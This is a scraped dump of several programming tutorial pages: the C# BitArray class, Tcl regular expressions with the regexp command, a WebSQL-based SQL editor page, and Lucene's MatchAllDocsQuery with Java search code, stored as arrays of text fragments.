compiled and executed, it produces the following result − Bit array ba1: 60 False False True True True True False False Bit array ba2: 13 True False True True False False False False Bit array ba3 after AND operation: 12 False False True True False False False False Bit array ba3 after OR operation: 61 True False True True False False False False 119 Lectures 23.5 hours Raja Biswas 37 Lectures 13 hours Trevoir Williams 16 Lectures 1 hours Peter Jepson 159 Lectures 21.5 hours Ebenezer Ogbu 193 Lectures 17 hours Arnold Higuit 24 Lectures 2.5 hours Eric Frick Print Add Notes Bookmark this page
[ { "code": null, "e": 2447, "s": 2270, "text": "The BitArray class manages a compact array of bit values, which are represented as Booleans, where true indicates that the bit is on (1) and false indicates the bit is off (0)." }, { "code": null, "e": 2638, "s": 2447, "text": "It is used when you need to store the bits but do not know the number of bits in advance. You can access items from the BitArray collection by using an integer index, which starts from zero." }, { "code": null, "e": 2725, "s": 2638, "text": "The following table lists some of the commonly used properties of the BitArray class −" }, { "code": null, "e": 2731, "s": 2725, "text": "Count" }, { "code": null, "e": 2786, "s": 2731, "text": "Gets the number of elements contained in the BitArray." }, { "code": null, "e": 2797, "s": 2786, "text": "IsReadOnly" }, { "code": null, "e": 2856, "s": 2797, "text": "Gets a value indicating whether the BitArray is read-only." }, { "code": null, "e": 2861, "s": 2856, "text": "Item" }, { "code": null, "e": 2935, "s": 2861, "text": "Gets or sets the value of the bit at a specific position in the BitArray." }, { "code": null, "e": 2942, "s": 2935, "text": "Length" }, { "code": null, "e": 2995, "s": 2942, "text": "Gets or sets the number of elements in the BitArray." }, { "code": null, "e": 3079, "s": 2995, "text": "The following table lists some of the commonly used methods of the BitArray class −" }, { "code": null, "e": 3116, "s": 3079, "text": "public BitArray And(BitArray value);" }, { "code": null, "e": 3253, "s": 3116, "text": "Performs the bitwise AND operation on the elements in the current BitArray against the corresponding elements in the specified BitArray." }, { "code": null, "e": 3281, "s": 3253, "text": "public bool Get(int index);" }, { "code": null, "e": 3347, "s": 3281, "text": "Gets the value of the bit at a specific position in the BitArray." }, { "code": null, "e": 3370, "s": 3347, "text": "public BitArray Not();" }, { "code": null, "e": 3520, "s": 3370, "text": "Inverts all the bit values in the current BitArray, so that elements set to true are changed to false, and elements set to false are changed to true." }, { "code": null, "e": 3556, "s": 3520, "text": "public BitArray Or(BitArray value);" }, { "code": null, "e": 3692, "s": 3556, "text": "Performs the bitwise OR operation on the elements in the current BitArray against the corresponding elements in the specified BitArray." }, { "code": null, "e": 3732, "s": 3692, "text": "public void Set(int index, bool value);" }, { "code": null, "e": 3808, "s": 3732, "text": "Sets the bit at a specific position in the BitArray to the specified value." }, { "code": null, "e": 3840, "s": 3808, "text": "public void SetAll(bool value);" }, { "code": null, "e": 3894, "s": 3840, "text": "Sets all bits in the BitArray to the specified value." }, { "code": null, "e": 3931, "s": 3894, "text": "public BitArray Xor(BitArray value);" }, { "code": null, "e": 4077, "s": 3931, "text": "Performs the bitwise eXclusive OR operation on the elements in the current BitArray against the corresponding elements in the specified BitArray." }, { "code": null, "e": 4140, "s": 4077, "text": "The following example demonstrates the use of BitArray class −" }, { "code": null, "e": 5705, "s": 4140, "text": "using System;\nusing System.Collections;\n\nnamespace CollectionsApplication {\n class Program {\n static void Main(string[] args) {\n //creating two bit arrays of size 8\n BitArray ba1 = new BitArray(8);\n BitArray ba2 = new BitArray(8);\n \n byte[] a = { 60 };\n byte[] b = { 13 };\n \n //storing the values 60, and 13 into the bit arrays\n ba1 = new BitArray(a);\n ba2 = new BitArray(b);\n \n //content of ba1\n Console.WriteLine(\"Bit array ba1: 60\");\n \n for (int i = 0; i < ba1.Count; i++) {\n Console.Write(\"{0, -6} \", ba1[i]);\n }\n Console.WriteLine();\n \n //content of ba2\n Console.WriteLine(\"Bit array ba2: 13\");\n \n for (int i = 0; i < ba2.Count; i++) {\n Console.Write(\"{0, -6} \", ba2[i]);\n }\n Console.WriteLine();\n BitArray ba3 = new BitArray(8);\n ba3 = ba1.And(ba2);\n \n //content of ba3\n Console.WriteLine(\"Bit array ba3 after AND operation: 12\");\n \n for (int i = 0; i < ba3.Count; i++) {\n Console.Write(\"{0, -6} \", ba3[i]);\n }\n Console.WriteLine();\n ba3 = ba1.Or(ba2);\n \n //content of ba3\n Console.WriteLine(\"Bit array ba3 after OR operation: 61\");\n \n for (int i = 0; i < ba3.Count; i++) {\n Console.Write(\"{0, -6} \", ba3[i]);\n }\n Console.WriteLine();\n\n Console.ReadKey();\n }\n }\n}" }, { "code": null, "e": 5786, "s": 5705, "text": "When the above code is compiled and executed, it produces the following result −" }, { "code": null, "e": 6083, "s": 5786, "text": "Bit array ba1: 60 \nFalse False True True True True False False \nBit array ba2: 13\nTrue False True True False False False False \nBit array ba3 after AND operation: 12\nFalse False True True False False False False \nBit array ba3 after OR operation: 61\nTrue False True True False False False False \n" }, { "code": null, "e": 6120, "s": 6083, "text": "\n 119 Lectures \n 23.5 hours \n" }, { "code": null, "e": 6133, "s": 6120, "text": " Raja Biswas" }, { "code": null, "e": 6167, "s": 6133, "text": "\n 37 Lectures \n 13 hours \n" }, { "code": null, "e": 6185, "s": 6167, "text": " Trevoir Williams" }, { "code": null, "e": 6218, "s": 6185, "text": "\n 16 Lectures \n 1 hours \n" }, { "code": null, "e": 6232, "s": 6218, "text": " Peter Jepson" }, { "code": null, "e": 6269, "s": 6232, "text": "\n 159 Lectures \n 21.5 hours \n" }, { "code": null, "e": 6284, "s": 6269, "text": " Ebenezer Ogbu" }, { "code": null, "e": 6319, "s": 6284, "text": "\n 193 Lectures \n 17 hours \n" }, { "code": null, "e": 6334, "s": 6319, "text": " Arnold Higuit" }, { "code": null, "e": 6369, "s": 6334, "text": "\n 24 Lectures \n 2.5 hours \n" }, { "code": null, "e": 6381, "s": 6369, "text": " Eric Frick" }, { "code": null, "e": 6388, "s": 6381, "text": " Print" }, { "code": null, "e": 6399, "s": 6388, "text": " Add Notes" } ]
Tcl - Regular Expressions
The "regexp" command is used to match a regular expression in Tcl. A regular expression is a sequence of characters that contains a search pattern. It consists of multiple rules and the following table explains these rules and corresponding use. x Exact match. [a-z] Any lowercase letter from a-z. . Any character. ^ Beginning string should match. $ Ending string should match. \^ Backlash sequence to match special character ^.Similarly you can use for other characters. () Add the above sequences inside parenthesis to make a regular expression. x* Should match 0 or more occurrences of the preceding x. x+ Should match 1 or more occurrences of the preceding x. [a-z]? Should match 0 or 1 occurrence of the preceding x. {digit} Matches exactly digit occurrences of previous regex expression. Digit that contains 0-9. {digit,} Matches 3 or more digit occurrences of previous regex expression. Digit that contains 0-9. {digit1,digit2} Occurrences matches the range between digit1 and digit2 occurrences of previous regex expression. The syntax for regex is given below − regexp optionalSwitches patterns searchString fullMatch subMatch1 ... subMatchn Here, regex is the command. We will see about optional switches later. Patterns are the rules as mentioned earlier. Search string is the actual string on which the regex is performed. Full match is any variable to hold the result of matched regex result. Submatch1 to SubMatchn are optional subMatch variable that holds the result of sub match patterns. Let's look at some simple examples before diving into complex ones. A simple example for a string with any alphabets. When any other character is encountered the regex, search will be stopped and returned. #!/usr/bin/tclsh regexp {([A-Za-z]*)} "Tcl Tutorial" a b puts "Full Match: $a" puts "Sub Match1: $b" When the above code is executed, it produces the following result − Full Match: Tcl Sub Match1: Tcl The following example shows how to search for multiple patterns. This is example pattern for any alphabets followed by any character followed by any alphabets. #!/usr/bin/tclsh regexp {([A-Za-z]*).([A-Za-z]*)} "Tcl Tutorial" a b c puts "Full Match: $a" puts "Sub Match1: $b" puts "Sub Match2: $c" When the above code is executed, it produces the following result − Full Match: Tcl Tutorial Sub Match1: Tcl Sub Match2: Tutorial A modified version of the above code to show that a sub pattern can contain multiple patterns is shown below − #!/usr/bin/tclsh regexp {([A-Za-z]*.([A-Za-z]*))} "Tcl Tutorial" a b c puts "Full Match: $a" puts "Sub Match1: $b" puts "Sub Match2: $c" When the above code is executed, it produces the following result − Full Match: Tcl Tutorial Sub Match1: Tcl Tutorial Sub Match2: Tutorial The list of switches available in Tcl are, nocase − Used to ignore case. nocase − Used to ignore case. indices − Store location of matched sub patterns instead of matched characters. indices − Store location of matched sub patterns instead of matched characters. line − New line sensitive matching. Ignores the characters after newline. line − New line sensitive matching. Ignores the characters after newline. start index − Sets the offset of start of search pattern. start index − Sets the offset of start of search pattern. Marks the end of switches Marks the end of switches In the above examples, I have deliberately used [A-Z, a-z] for all alphabets, you can easily use -nocase instead of as shown below − #!/usr/bin/tclsh regexp -nocase {([A-Z]*.([A-Z]*))} "Tcl Tutorial" a b c puts "Full Match: $a" puts "Sub Match1: $b" puts "Sub Match2: $c" When the above code is executed, it produces the following result − Full Match: Tcl Tutorial Sub Match1: Tcl Tutorial Sub Match2: Tutorial Another example using switches is shown below − #!/usr/bin/tclsh regexp -nocase -line -- {([A-Z]*.([A-Z]*))} "Tcl \nTutorial" a b puts "Full Match: $a" puts "Sub Match1: $b" regexp -nocase -start 4 -line -- {([A-Z]*.([A-Z]*))} "Tcl \nTutorial" a b puts "Full Match: $a" puts "Sub Match1: $b" When the above code is executed, it produces the following result − Full Match: Tcl Sub Match1: Tcl Full Match: Tutorial Sub Match1: Tutorial Print Add Notes Bookmark this page
[ { "code": null, "e": 2447, "s": 2201, "text": "The \"regexp\" command is used to match a regular expression in Tcl. A regular expression is a sequence of characters that contains a search pattern. It consists of multiple rules and the following table explains these rules and corresponding use." }, { "code": null, "e": 2449, "s": 2447, "text": "x" }, { "code": null, "e": 2462, "s": 2449, "text": "Exact match." }, { "code": null, "e": 2468, "s": 2462, "text": "[a-z]" }, { "code": null, "e": 2499, "s": 2468, "text": "Any lowercase letter from a-z." }, { "code": null, "e": 2501, "s": 2499, "text": "." }, { "code": null, "e": 2516, "s": 2501, "text": "Any character." }, { "code": null, "e": 2518, "s": 2516, "text": "^" }, { "code": null, "e": 2549, "s": 2518, "text": "Beginning string should match." }, { "code": null, "e": 2551, "s": 2549, "text": "$" }, { "code": null, "e": 2579, "s": 2551, "text": "Ending string should match." }, { "code": null, "e": 2582, "s": 2579, "text": "\\^" }, { "code": null, "e": 2673, "s": 2582, "text": "Backlash sequence to match special character ^.Similarly you can use for other characters." }, { "code": null, "e": 2676, "s": 2673, "text": "()" }, { "code": null, "e": 2749, "s": 2676, "text": "Add the above sequences inside parenthesis to make a regular expression." }, { "code": null, "e": 2752, "s": 2749, "text": "x*" }, { "code": null, "e": 2807, "s": 2752, "text": "Should match 0 or more occurrences of the preceding x." }, { "code": null, "e": 2810, "s": 2807, "text": "x+" }, { "code": null, "e": 2865, "s": 2810, "text": "Should match 1 or more occurrences of the preceding x." }, { "code": null, "e": 2872, "s": 2865, "text": "[a-z]?" }, { "code": null, "e": 2923, "s": 2872, "text": "Should match 0 or 1 occurrence of the preceding x." }, { "code": null, "e": 2931, "s": 2923, "text": "{digit}" }, { "code": null, "e": 3020, "s": 2931, "text": "Matches exactly digit occurrences of previous regex expression. Digit that contains 0-9." }, { "code": null, "e": 3029, "s": 3020, "text": "{digit,}" }, { "code": null, "e": 3120, "s": 3029, "text": "Matches 3 or more digit occurrences of previous regex expression. Digit that contains 0-9." }, { "code": null, "e": 3136, "s": 3120, "text": "{digit1,digit2}" }, { "code": null, "e": 3234, "s": 3136, "text": "Occurrences matches the range between digit1 and digit2 occurrences of previous regex expression." }, { "code": null, "e": 3272, "s": 3234, "text": "The syntax for regex is given below −" }, { "code": null, "e": 3353, "s": 3272, "text": "regexp optionalSwitches patterns searchString fullMatch subMatch1 ... subMatchn\n" }, { "code": null, "e": 3707, "s": 3353, "text": "Here, regex is the command. We will see about optional switches later. Patterns are the rules as mentioned earlier. Search string is the actual string on which the regex is performed. Full match is any variable to hold the result of matched regex result. Submatch1 to SubMatchn are optional subMatch variable that holds the result of sub match patterns." }, { "code": null, "e": 3913, "s": 3707, "text": "Let's look at some simple examples before diving into complex ones. A simple example for a string with any alphabets. When any other character is encountered the regex, search will be stopped and returned." }, { "code": null, "e": 4016, "s": 3913, "text": "#!/usr/bin/tclsh\n\nregexp {([A-Za-z]*)} \"Tcl Tutorial\" a b \nputs \"Full Match: $a\"\nputs \"Sub Match1: $b\"" }, { "code": null, "e": 4084, "s": 4016, "text": "When the above code is executed, it produces the following result −" }, { "code": null, "e": 4117, "s": 4084, "text": "Full Match: Tcl\nSub Match1: Tcl\n" }, { "code": null, "e": 4277, "s": 4117, "text": "The following example shows how to search for multiple patterns. This is example pattern for any alphabets followed by any character followed by any alphabets." }, { "code": null, "e": 4417, "s": 4277, "text": "#!/usr/bin/tclsh\n\nregexp {([A-Za-z]*).([A-Za-z]*)} \"Tcl Tutorial\" a b c \nputs \"Full Match: $a\"\nputs \"Sub Match1: $b\"\nputs \"Sub Match2: $c\"" }, { "code": null, "e": 4485, "s": 4417, "text": "When the above code is executed, it produces the following result −" }, { "code": null, "e": 4548, "s": 4485, "text": "Full Match: Tcl Tutorial\nSub Match1: Tcl\nSub Match2: Tutorial\n" }, { "code": null, "e": 4659, "s": 4548, "text": "A modified version of the above code to show that a sub pattern can contain multiple patterns is shown below −" }, { "code": null, "e": 4799, "s": 4659, "text": "#!/usr/bin/tclsh\n\nregexp {([A-Za-z]*.([A-Za-z]*))} \"Tcl Tutorial\" a b c \nputs \"Full Match: $a\"\nputs \"Sub Match1: $b\"\nputs \"Sub Match2: $c\"" }, { "code": null, "e": 4867, "s": 4799, "text": "When the above code is executed, it produces the following result −" }, { "code": null, "e": 4939, "s": 4867, "text": "Full Match: Tcl Tutorial\nSub Match1: Tcl Tutorial\nSub Match2: Tutorial\n" }, { "code": null, "e": 4982, "s": 4939, "text": "The list of switches available in Tcl are," }, { "code": null, "e": 5012, "s": 4982, "text": "nocase − Used to ignore case." }, { "code": null, "e": 5042, "s": 5012, "text": "nocase − Used to ignore case." }, { "code": null, "e": 5122, "s": 5042, "text": "indices − Store location of matched sub patterns instead of matched characters." }, { "code": null, "e": 5202, "s": 5122, "text": "indices − Store location of matched sub patterns instead of matched characters." }, { "code": null, "e": 5276, "s": 5202, "text": "line − New line sensitive matching. Ignores the characters after newline." }, { "code": null, "e": 5350, "s": 5276, "text": "line − New line sensitive matching. Ignores the characters after newline." }, { "code": null, "e": 5408, "s": 5350, "text": "start index − Sets the offset of start of search pattern." }, { "code": null, "e": 5466, "s": 5408, "text": "start index − Sets the offset of start of search pattern." }, { "code": null, "e": 5492, "s": 5466, "text": "Marks the end of switches" }, { "code": null, "e": 5518, "s": 5492, "text": "Marks the end of switches" }, { "code": null, "e": 5651, "s": 5518, "text": "In the above examples, I have deliberately used [A-Z, a-z] for all alphabets, you can easily use -nocase instead of as shown below −" }, { "code": null, "e": 5793, "s": 5651, "text": "#!/usr/bin/tclsh\n\nregexp -nocase {([A-Z]*.([A-Z]*))} \"Tcl Tutorial\" a b c \nputs \"Full Match: $a\"\nputs \"Sub Match1: $b\"\nputs \"Sub Match2: $c\"" }, { "code": null, "e": 5861, "s": 5793, "text": "When the above code is executed, it produces the following result −" }, { "code": null, "e": 5933, "s": 5861, "text": "Full Match: Tcl Tutorial\nSub Match1: Tcl Tutorial\nSub Match2: Tutorial\n" }, { "code": null, "e": 5981, "s": 5933, "text": "Another example using switches is shown below −" }, { "code": null, "e": 6229, "s": 5981, "text": "#!/usr/bin/tclsh\n\nregexp -nocase -line -- {([A-Z]*.([A-Z]*))} \"Tcl \\nTutorial\" a b \nputs \"Full Match: $a\"\nputs \"Sub Match1: $b\"\nregexp -nocase -start 4 -line -- {([A-Z]*.([A-Z]*))} \"Tcl \\nTutorial\" a b \nputs \"Full Match: $a\"\nputs \"Sub Match1: $b\"" }, { "code": null, "e": 6297, "s": 6229, "text": "When the above code is executed, it produces the following result −" }, { "code": null, "e": 6374, "s": 6297, "text": "Full Match: Tcl \nSub Match1: Tcl \nFull Match: Tutorial\nSub Match1: Tutorial\n" }, { "code": null, "e": 6381, "s": 6374, "text": " Print" }, { "code": null, "e": 6392, "s": 6381, "text": " Add Notes" } ]
SQLSERVER Tryit Editor v1.0
Edit the SQL Statement, and click "Run SQL" to see the result. This SQL-Statement is not supported in the WebSQL Database. The example still works, because it uses a modified version of SQL. Your browser does not support WebSQL. Your are now using a light-version of the Try-SQL Editor, with a read-only Database. If you switch to a browser with WebSQL support, you can try any SQL statement, and play with the Database as much as you like. The Database can also be restored at any time. Our Try-SQL Editor uses WebSQL to demonstrate SQL. A Database-object is created in your browser, for testing purposes. You can try any SQL statement, and play with the Database as much as you like. The Database can be restored at any time, simply by clicking the "Restore Database" button. WebSQL stores a Database locally, on the user's computer. Each user gets their own Database object. WebSQL is supported in Chrome, Safari, and Opera. If you use another browser you will still be able to use our Try SQL Editor, but a different version, using a server-based ASP application, with a read-only Access Database, where users are not allowed to make any changes to the data.
[ { "code": null, "e": 106, "s": 43, "text": "Edit the SQL Statement, and click \"Run SQL\" to see the result." }, { "code": null, "e": 166, "s": 106, "text": "This SQL-Statement is not supported in the WebSQL Database." }, { "code": null, "e": 234, "s": 166, "text": "The example still works, because it uses a modified version of SQL." }, { "code": null, "e": 272, "s": 234, "text": "Your browser does not support WebSQL." }, { "code": null, "e": 357, "s": 272, "text": "Your are now using a light-version of the Try-SQL Editor, with a read-only Database." }, { "code": null, "e": 531, "s": 357, "text": "If you switch to a browser with WebSQL support, you can try any SQL statement, and play with the Database as much as you like. The Database can also be restored at any time." }, { "code": null, "e": 582, "s": 531, "text": "Our Try-SQL Editor uses WebSQL to demonstrate SQL." }, { "code": null, "e": 650, "s": 582, "text": "A Database-object is created in your browser, for testing purposes." }, { "code": null, "e": 821, "s": 650, "text": "You can try any SQL statement, and play with the Database as much as you like. The Database can be restored at any time, simply by clicking the \"Restore Database\" button." }, { "code": null, "e": 921, "s": 821, "text": "WebSQL stores a Database locally, on the user's computer. Each user gets their own Database object." }, { "code": null, "e": 971, "s": 921, "text": "WebSQL is supported in Chrome, Safari, and Opera." } ]
Lucene - MatchAllDocsQuery
MatchAllDocsQuery as the name suggests, matches all the documents. Following is the declaration for org.apache.lucene.search.MatchAllDocsQuery class: public class MatchAllDocsQuery extends Query MatchAllDocsQuery() MatchAllDocsQuery(String normsField) Weight create Weight(Searcher searcher) Expert: Constructs an appropriate Weight implementation for this query. boolean equals(Object o) void extractTerms(Set terms) Expert: adds all terms occurring in this query to the terms set. int hashCode() String to String(String field) Prints a query to a string, with field assumed to be the default field and omitted. This class inherits methods from the following classes − org.apache.lucene.search.Query java.lang.Object private void searchUsingMatchAllDocsQuery(String searchQuery) throws IOException, ParseException { searcher = new Searcher(indexDir); long startTime = System.currentTimeMillis(); //create the term query object Query query = new MatchAllDocsQuery(searchQuery); //do the search TopDocs hits = searcher.search(query); long endTime = System.currentTimeMillis(); System.out.println(hits.totalHits + " documents found. Time :" + (endTime - startTime) + "ms"); for(ScoreDoc scoreDoc : hits.scoreDocs) { Document doc = searcher.getDocument(scoreDoc); System.out.print("Score: "+ scoreDoc.score + " "); System.out.println("File: "+ doc.get(LuceneConstants.FILE_PATH)); } searcher.close(); } Let us create a test Lucene application to test search using MatchAllDocsQuery. Create a project with a name LuceneFirstApplication under a packagecom.tutorialspoint.lucene as explained in the Lucene - First Application chapter. You can also use the project created in Lucene - First Application chapter as such for this chapter to understand searching process. Create LuceneConstants.java and Searcher.java as explained in the Lucene - First Application chapter. Keep the rest of the files unchanged. Create LuceneTester.java as mentioned below. Clean and Build the application to make sure business logic is working as per the requirements. This class is used to provide various constants to be used across the sample application. package com.tutorialspoint.lucene; public class LuceneConstants { public static final String CONTENTS = "contents"; public static final String FILE_NAME = "filename"; public static final String FILE_PATH = "filepath"; public static final int MAX_SEARCH = 10; } This class is used to read the indexes made on raw data and searches data using the Lucene library. package com.tutorialspoint.lucene; import java.io.File; import java.io.IOException; import org.apache.lucene.analysis.standard.StandardAnalyzer; import org.apache.lucene.document.Document; import org.apache.lucene.index.CorruptIndexException; import org.apache.lucene.queryParser.ParseException; import org.apache.lucene.queryParser.QueryParser; import org.apache.lucene.search.IndexSearcher; import org.apache.lucene.search.Query; import org.apache.lucene.search.ScoreDoc; import org.apache.lucene.search.TopDocs; import org.apache.lucene.store.Directory; import org.apache.lucene.store.FSDirectory; import org.apache.lucene.util.Version; public class Searcher { IndexSearcher indexSearcher; QueryParser queryParser; Query query; public Searcher(String indexDirectoryPath) throws IOException { Directory indexDirectory = FSDirectory.open(new File(indexDirectoryPath)); indexSearcher = new IndexSearcher(indexDirectory); queryParser = new QueryParser(Version.LUCENE_36, LuceneConstants.CONTENTS, new StandardAnalyzer(Version.LUCENE_36)); } public TopDocs search( String searchQuery) throws IOException, ParseException { query = queryParser.parse(searchQuery); return indexSearcher.search(query, LuceneConstants.MAX_SEARCH); } public TopDocs search(Query query) throws IOException, ParseException { return indexSearcher.search(query, LuceneConstants.MAX_SEARCH); } public Document getDocument(ScoreDoc scoreDoc) throws CorruptIndexException, IOException { return indexSearcher.doc(scoreDoc.doc); } public void close() throws IOException { indexSearcher.close(); } } This class is used to test the searching capability of the Lucene library. package com.tutorialspoint.lucene; import java.io.IOException; import org.apache.lucene.document.Document; import org.apache.lucene.index.Term; import org.apache.lucene.queryParser.ParseException; import org.apache.lucene.search.MatchAllDocsQuery; import org.apache.lucene.search.Query; import org.apache.lucene.search.ScoreDoc; import org.apache.lucene.search.TopDocs; public class LuceneTester { String indexDir = "E:\\Lucene\\Index"; String dataDir = "E:\\Lucene\\Data"; Searcher searcher; public static void main(String[] args) { LuceneTester tester; try { tester = new LuceneTester(); tester.searchUsingMatchAllDocsQuery(""); } catch (IOException e) { e.printStackTrace(); } catch (ParseException e) { e.printStackTrace(); } } private void searchUsingMatchAllDocsQuery(String searchQuery) throws IOException, ParseException { searcher = new Searcher(indexDir); long startTime = System.currentTimeMillis(); //create the term query object Query query = new MatchAllDocsQuery(searchQuery); //do the search TopDocs hits = searcher.search(query); long endTime = System.currentTimeMillis(); System.out.println(hits.totalHits + " documents found. Time :" + (endTime - startTime) + "ms"); for(ScoreDoc scoreDoc : hits.scoreDocs) { Document doc = searcher.getDocument(scoreDoc); System.out.print("Score: "+ scoreDoc.score + " "); System.out.println("File: "+ doc.get(LuceneConstants.FILE_PATH)); } searcher.close(); } } I've used 10 text files from record1.txt to record10.txt containing names and other details of the students and put them in the directory E:\Lucene\Data. Test Data. An index directory path should be created as E:\Lucene\Index. After running the indexing program in the chapter Lucene - Indexing Process, you can see the list of index files created in that folder. Once you are done with the creation of the source, the raw data, the data directory, the index directory and the indexes, you can proceed by compiling and running your program. To do this, keep the LuceneTester.Java file tab active and use either the Run option available in the Eclipse IDE or use Ctrl + F11 to compile and run your LuceneTester application. If your application runs successfully, it will print the following message in Eclipse IDE's console − 10 documents found. Time :9ms Score: 1.0 File: E:\Lucene\Data\record1.txt Score: 1.0 File: E:\Lucene\Data\record10.txt Score: 1.0 File: E:\Lucene\Data\record2.txt Score: 1.0 File: E:\Lucene\Data\record3.txt Score: 1.0 File: E:\Lucene\Data\record4.txt Score: 1.0 File: E:\Lucene\Data\record5.txt Score: 1.0 File: E:\Lucene\Data\record6.txt Score: 1.0 File: E:\Lucene\Data\record7.txt Score: 1.0 File: E:\Lucene\Data\record8.txt Score: 1.0 File: E:\Lucene\Data\record9.txt Print Add Notes Bookmark this page
[ { "code": null, "e": 1910, "s": 1843, "text": "MatchAllDocsQuery as the name suggests, matches all the documents." }, { "code": null, "e": 1993, "s": 1910, "text": "Following is the declaration for org.apache.lucene.search.MatchAllDocsQuery class:" }, { "code": null, "e": 2042, "s": 1993, "text": "public class MatchAllDocsQuery\n extends Query\n" }, { "code": null, "e": 2062, "s": 2042, "text": "MatchAllDocsQuery()" }, { "code": null, "e": 2099, "s": 2062, "text": "MatchAllDocsQuery(String normsField)" }, { "code": null, "e": 2139, "s": 2099, "text": "Weight create Weight(Searcher searcher)" }, { "code": null, "e": 2211, "s": 2139, "text": "Expert: Constructs an appropriate Weight implementation for this query." }, { "code": null, "e": 2236, "s": 2211, "text": "boolean equals(Object o)" }, { "code": null, "e": 2265, "s": 2236, "text": "void extractTerms(Set terms)" }, { "code": null, "e": 2330, "s": 2265, "text": "Expert: adds all terms occurring in this query to the terms set." }, { "code": null, "e": 2345, "s": 2330, "text": "int hashCode()" }, { "code": null, "e": 2376, "s": 2345, "text": "String to String(String field)" }, { "code": null, "e": 2460, "s": 2376, "text": "Prints a query to a string, with field assumed to be the default field and omitted." }, { "code": null, "e": 2517, "s": 2460, "text": "This class inherits methods from the following classes −" }, { "code": null, "e": 2548, "s": 2517, "text": "org.apache.lucene.search.Query" }, { "code": null, "e": 2565, "s": 2548, "text": "java.lang.Object" }, { "code": null, "e": 3312, "s": 2565, "text": "private void searchUsingMatchAllDocsQuery(String searchQuery)\n throws IOException, ParseException {\n searcher = new Searcher(indexDir);\n long startTime = System.currentTimeMillis();\n \n //create the term query object\n Query query = new MatchAllDocsQuery(searchQuery);\n //do the search\n TopDocs hits = searcher.search(query);\n long endTime = System.currentTimeMillis();\n\n System.out.println(hits.totalHits +\n \" documents found. Time :\" + (endTime - startTime) + \"ms\");\n for(ScoreDoc scoreDoc : hits.scoreDocs) {\n Document doc = searcher.getDocument(scoreDoc);\n System.out.print(\"Score: \"+ scoreDoc.score + \" \");\n System.out.println(\"File: \"+ doc.get(LuceneConstants.FILE_PATH));\n }\n searcher.close();\n}" }, { "code": null, "e": 3392, "s": 3312, "text": "Let us create a test Lucene application to test search using MatchAllDocsQuery." }, { "code": null, "e": 3674, "s": 3392, "text": "Create a project with a name LuceneFirstApplication under a packagecom.tutorialspoint.lucene as explained in the Lucene - First Application chapter. You can also use the project created in Lucene - First Application chapter as such for this chapter to understand searching process." }, { "code": null, "e": 3814, "s": 3674, "text": "Create LuceneConstants.java and Searcher.java as explained in the Lucene - First Application chapter. Keep the rest of the files unchanged." }, { "code": null, "e": 3859, "s": 3814, "text": "Create LuceneTester.java as mentioned below." }, { "code": null, "e": 3955, "s": 3859, "text": "Clean and Build the application to make sure business logic is working as per the requirements." }, { "code": null, "e": 4045, "s": 3955, "text": "This class is used to provide various constants to be used across the sample application." }, { "code": null, "e": 4319, "s": 4045, "text": "package com.tutorialspoint.lucene;\n\npublic class LuceneConstants {\n public static final String CONTENTS = \"contents\";\n public static final String FILE_NAME = \"filename\";\n public static final String FILE_PATH = \"filepath\";\n public static final int MAX_SEARCH = 10;\n}" }, { "code": null, "e": 4419, "s": 4319, "text": "This class is used to read the indexes made on raw data and searches data using the Lucene library." }, { "code": null, "e": 6127, "s": 4419, "text": "package com.tutorialspoint.lucene;\n\nimport java.io.File;\nimport java.io.IOException;\n\nimport org.apache.lucene.analysis.standard.StandardAnalyzer;\nimport org.apache.lucene.document.Document;\nimport org.apache.lucene.index.CorruptIndexException;\nimport org.apache.lucene.queryParser.ParseException;\nimport org.apache.lucene.queryParser.QueryParser;\nimport org.apache.lucene.search.IndexSearcher;\nimport org.apache.lucene.search.Query;\nimport org.apache.lucene.search.ScoreDoc;\nimport org.apache.lucene.search.TopDocs;\nimport org.apache.lucene.store.Directory;\nimport org.apache.lucene.store.FSDirectory;\nimport org.apache.lucene.util.Version;\n\npublic class Searcher {\n\t\n IndexSearcher indexSearcher;\n QueryParser queryParser;\n Query query;\n\n public Searcher(String indexDirectoryPath) throws IOException {\n Directory indexDirectory = \n FSDirectory.open(new File(indexDirectoryPath));\n indexSearcher = new IndexSearcher(indexDirectory);\n queryParser = new QueryParser(Version.LUCENE_36,\n LuceneConstants.CONTENTS,\n new StandardAnalyzer(Version.LUCENE_36));\n }\n\n public TopDocs search( String searchQuery) \n throws IOException, ParseException {\n query = queryParser.parse(searchQuery);\n return indexSearcher.search(query, LuceneConstants.MAX_SEARCH);\n }\n \n public TopDocs search(Query query) throws IOException, ParseException {\n return indexSearcher.search(query, LuceneConstants.MAX_SEARCH);\n }\n\n public Document getDocument(ScoreDoc scoreDoc) \n throws CorruptIndexException, IOException {\n return indexSearcher.doc(scoreDoc.doc);\t\n }\n\n public void close() throws IOException {\n indexSearcher.close();\n }\n}" }, { "code": null, "e": 6202, "s": 6127, "text": "This class is used to test the searching capability of the Lucene library." }, { "code": null, "e": 7827, "s": 6202, "text": "package com.tutorialspoint.lucene;\n\nimport java.io.IOException;\n\nimport org.apache.lucene.document.Document;\nimport org.apache.lucene.index.Term;\nimport org.apache.lucene.queryParser.ParseException;\nimport org.apache.lucene.search.MatchAllDocsQuery;\nimport org.apache.lucene.search.Query;\nimport org.apache.lucene.search.ScoreDoc;\nimport org.apache.lucene.search.TopDocs;\n\npublic class LuceneTester {\n\t\n String indexDir = \"E:\\\\Lucene\\\\Index\";\n String dataDir = \"E:\\\\Lucene\\\\Data\";\n Searcher searcher;\n\n public static void main(String[] args) {\n LuceneTester tester;\n try {\n tester = new LuceneTester();\n tester.searchUsingMatchAllDocsQuery(\"\");\n } catch (IOException e) {\n e.printStackTrace();\n } catch (ParseException e) {\n e.printStackTrace();\n }\n }\n private void searchUsingMatchAllDocsQuery(String searchQuery)\n throws IOException, ParseException {\n searcher = new Searcher(indexDir);\n long startTime = System.currentTimeMillis();\n \n //create the term query object\n Query query = new MatchAllDocsQuery(searchQuery);\n //do the search\n TopDocs hits = searcher.search(query);\n long endTime = System.currentTimeMillis();\n\n System.out.println(hits.totalHits +\n \" documents found. Time :\" + (endTime - startTime) + \"ms\");\n for(ScoreDoc scoreDoc : hits.scoreDocs) {\n Document doc = searcher.getDocument(scoreDoc);\n System.out.print(\"Score: \"+ scoreDoc.score + \" \");\n System.out.println(\"File: \"+ doc.get(LuceneConstants.FILE_PATH));\n }\n searcher.close();\n }\n}" }, { "code": null, "e": 8191, "s": 7827, "text": "I've used 10 text files from record1.txt to record10.txt containing names and other details of the students and put them in the directory E:\\Lucene\\Data. Test Data. An index directory path should be created as E:\\Lucene\\Index. After running the indexing program in the chapter Lucene - Indexing Process, you can see the list of index files created in that folder." 